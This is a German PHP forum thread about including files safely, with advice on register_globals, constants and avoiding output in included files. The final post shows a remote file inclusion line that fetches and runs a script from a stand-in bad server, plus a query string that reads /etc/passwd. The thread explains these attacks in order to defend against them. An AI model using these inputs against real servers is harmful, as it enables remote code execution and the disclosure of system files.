|
Re: [PHP] - Sicheres Includen
Zitat:
Greetz alcaeus |
Re: [PHP] - Sicheres Includen
$_SERVER['DOCUMENT_ROOT']
^ ist ein array welches überschrieben werden kann. $Sec.$Site; ^ sind variablen welche überschrieben werden können. besonders gefährlich im zusammenhang mit register_globals on! nimm eine constante also etwas was mit define definiert wird - einmalig. |
Re: [PHP] - Sicheres Includen
Mal ein ganz anderer Ansatz...
Wenn man HTML und PHP Code nicht mischt sondern alles in PHP codet. Das heisst es gibt keine echos oder sonstige Ausgaben in den includeten Dateien und man schreibt alles objectorientiert, dann kann man ruhig eine dieser Dateien aufrufen. Im Browser kommt dann nur noch eine leere Seite an. In meinen PHP-Anwendungen gibt es so nur eine echo-Zeile, am Ende und im Hauptscript. Gruss Thorsten |
Re: [PHP] - Sicheres Includen
Zitat:
Code:
Der Code ladet bei aktivem allow_url_fopen den Inhalt von badscript.txt und fuehrt ihn anschliessend aus. Das ist...suboptimal.
include('http://badserver.tld/badscript.txt');
Ein weiteres Problem:
Code:
Bei einem nicht optimal konfigurierten Server (und das kommt leider oefter vor als man glauben will) kannst du dir vorstellen was da passiert...
mypage.php?include=/etc/passwd
Greetz alcaeus |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 12:02 Uhr. |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024-2025 by Thomas Breitkreuz